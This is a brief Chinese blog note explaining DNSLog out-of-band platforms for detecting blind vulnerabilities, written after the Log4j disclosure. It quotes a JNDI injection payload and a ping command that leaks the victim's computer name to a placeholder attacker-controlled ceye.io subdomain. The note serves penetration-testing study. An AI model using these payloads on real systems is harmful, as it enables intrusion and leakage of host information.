[NOTE] 关于DNSLog平台的使用

发布时间:2025-12-10 11:47:06 浏览次数:4

[NOTE] 关于DNSLog平台的使用

前言

起因是12.09午夜的Log4j核弹级漏洞
大家验证漏洞的payload:${jndi:idap://XXXX.dnslog.cn/aa}
发现大家用的都是DNSLog,而自己还不太懂这个
于是发现自己还是真的菜

就赶紧补一波

所以说什么时候自己租个服务器

DNSLog Platform

现如今的DNS解析一般是一个递归+迭代解析的过程:

粉->蓝->黄->绿->红

其中我们可以自己建立一个红色的服务器,接收记录每次的DNS请求

可以在一些在线的DNSLog平台申请一个域名,作为临时的DNS服务器
受害者查询的这个域名解析请求,会被该DNS服务器记录下
攻击者就可以结合其他字段形成payload,来进行渗透测试

主要针对无回显、盲注的情况

  • SQL盲注

  • RCE

  • SSRF

  • RFI (Remote File Inclusion)

相当于是提供一个回显的地方

实例

以CEYE为例

在CEYE已经申请到了一个子域名:XXXXX.ceye.io
这个就相当于是一个攻击者的DNS服务器了
然后任何关于*.XXXXX.ceye.io\*的解析请求都会被记录

于是简单一下,尝试:ping whoami.XXXXX.ceye.io

结合其他字段形成payload:ping %computername%.XXXXX.ceye.io

大概就这样吧
CEYE除了DNS服务器之外,还有HTTP服务器

最后记下Windows和Linux的一些常用系统变量
另起笔记,在这里

需要做网站?需要网络推广?欢迎咨询客户经理 13272073477